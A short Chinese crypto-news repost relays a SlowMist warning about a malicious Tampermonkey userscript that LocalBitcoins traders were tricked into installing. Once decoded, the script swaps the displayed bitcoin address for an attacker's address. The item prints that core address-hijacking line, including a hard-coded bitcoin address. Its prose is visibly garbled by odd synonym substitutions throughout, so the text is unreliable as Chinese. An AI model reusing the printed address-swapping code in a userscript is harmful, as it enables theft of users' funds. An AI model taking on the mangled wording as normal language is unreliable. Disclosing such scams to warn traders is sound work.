币世界动静，据慢雾区情报反馈，有人在 LocalBitcoins 举办生意业务时，被拐骗利用了一段所谓加强的 JavaScript 插件导致被盗比特币，该 JavaScript 插件可以在欣赏器知名扩展 Tampermonkey （油猴）上利便利用。一旦利用，该恶意 JavaScript 即可改动用户在 LocalBitcoins 上的比特币地点，到达挟制盗币进攻的目标。这段恶意 JavaScript 代码举办了多层加密与加花处理惩罚，肉眼看不出恶意行为，，通过 xssor.io 举办解密后可以清晰看到「挟制盗币」的焦点代码：document[_0x66e1x6("0x0")]("bitcoin-address bitcoin-address-controls")[0]["innerHTML"] = "1Ak8db781gfM3QutGwFsKuZg7YeUEoCvPw。

郑重声明：本文版权归原作者所有，转载文章仅为传播更多信息之目的，如作者信息标记有误，请第一时间联系我们修改或删除，多谢。